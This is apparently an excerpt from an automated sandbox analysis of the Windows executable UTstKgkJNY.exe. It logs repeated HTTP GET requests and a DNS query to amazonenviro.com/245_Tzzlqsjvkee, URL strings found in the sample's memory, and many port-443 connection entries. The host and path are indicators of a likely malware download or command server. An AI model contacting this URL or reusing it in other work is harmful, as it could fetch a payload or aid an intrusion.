            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficHTTP traffic detected: GET /245_Tzzlqsjvkee HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
            Source: global trafficDNS traffic detected: DNS query: amazonenviro.com
            Source: UTstKgkJNY.exe, 00000001.00000003.2446526925.000000000060E000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.1512344907.00000000005FD000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000002.2511530710.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.1633956543.000000000060E000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.1369796993.000000000060E000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.2489466445.000000000060E000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.1303825538.00000000005F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/
            Source: UTstKgkJNY.exe, 00000001.00000003.1336787995.00000000005FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Tzzlqsjvkee
            Source: UTstKgkJNY.exe, 00000001.00000003.1303825538.00000000005F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Tzzlqsjvkee$V
            Source: UTstKgkJNY.exe, 00000001.00000003.2489466445.00000000005EE000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000002.2511530710.00000000005EE000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.1336787995.00000000005ED000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.2446526925.00000000005EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Tzzlqsjvkee.
            Source: UTstKgkJNY.exe, 00000001.00000002.2511530710.0000000000601000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.1336787995.00000000005FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Tzzlqsjvkee0
            Source: UTstKgkJNY.exe, 00000001.00000003.1369796993.00000000005FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Tzzlqsjvkee5
            Source: UTstKgkJNY.exe, 00000001.00000003.2489466445.000000000059E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Tzzlqsjvkee77
            Source: UTstKgkJNY.exe, 00000001.00000003.1320430561.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.1369796993.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.1303825538.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.1336787995.00000000005FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_TzzlqsjvkeeAL
            Source: UTstKgkJNY.exe, 00000001.00000003.2446526925.0000000000617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_TzzlqsjvkeeHH
            Source: UTstKgkJNY.exe, 00000001.00000003.1369796993.0000000000620000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_TzzlqsjvkeeO
            Source: UTstKgkJNY.exe, 00000001.00000003.1512344907.00000000005FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_TzzlqsjvkeeQH
            Source: UTstKgkJNY.exe, 00000001.00000003.2446526925.00000000005FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Tzzlqsjvkeec
            Source: UTstKgkJNY.exe, 00000001.00000003.1633956543.0000000000617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Tzzlqsjvkeec;
            Source: UTstKgkJNY.exe, 00000001.00000002.2511530710.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.1320430561.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.1303825538.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.1336787995.00000000005FF000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.2489466445.00000000005B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Tzzlqsjvkeei
            Source: UTstKgkJNY.exe, 00000001.00000003.2489466445.00000000005EE000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000002.2511530710.00000000005EE000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.1512344907.00000000005ED000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.2446526925.00000000005EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Tzzlqsjvkeem
            Source: UTstKgkJNY.exe, 00000001.00000003.2489466445.0000000000617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_TzzlqsjvkeeoH
            Source: UTstKgkJNY.exe, 00000001.00000003.1303825538.00000000005F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Tzzlqsjvkeep
            Source: UTstKgkJNY.exe, 00000001.00000002.2511530710.00000000005B7000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.2489466445.00000000005B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/245_Tzzlqsjvkeeui
            Source: UTstKgkJNY.exe, 00000001.00000003.1320430561.000000000060E000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.1336787995.000000000060E000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.1303825538.00000000005F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/4
            Source: UTstKgkJNY.exe, 00000001.00000003.1512344907.00000000005FD000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000002.2511530710.000000000060E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/Ad0
            Source: UTstKgkJNY.exe, 00000001.00000003.1512344907.00000000005FD000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.1336787995.000000000060E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/Qd
            Source: UTstKgkJNY.exe, 00000001.00000003.2446526925.000000000060E000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.1369796993.000000000060E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/id(
            Source: UTstKgkJNY.exe, 00000001.00000003.2446526925.000000000060E000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000002.2511530710.000000000060E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com/yd8
            Source: UTstKgkJNY.exe, 00000001.00000003.2446526925.00000000005E5000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.2489466445.00000000005E4000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000002.2511530710.00000000005E5000.00000004.00000020.00020000.00000000.sdmp, UTstKgkJNY.exe, 00000001.00000003.1512344907.00000000005E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://amazonenviro.com:443/245_Tzzlqsjvkee
            Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
            Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
            Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
            Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50125 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
            Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
            Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
            Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50113 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
            Source: unknownNetwork traffic detected: HTTP traffic on port 50107 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
            Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
            Source: unknownNetwork traffic detected: HTTP traffic on port 50120 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
            Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
            Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
            Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
            Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
            Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
            Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
            Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
            Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
            Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50119 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
            Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
            Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
            Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
            Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
            Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
            Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
            Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50103 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
            Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
            Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
            Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50121 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
            Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
            Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
            Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
            Source: unknownNetwork traffic detected: HTTP traffic on port 50115 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
            Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
            Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
            Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50122 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
            Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
            Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
            Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50101
            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
            Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
            Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
            Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
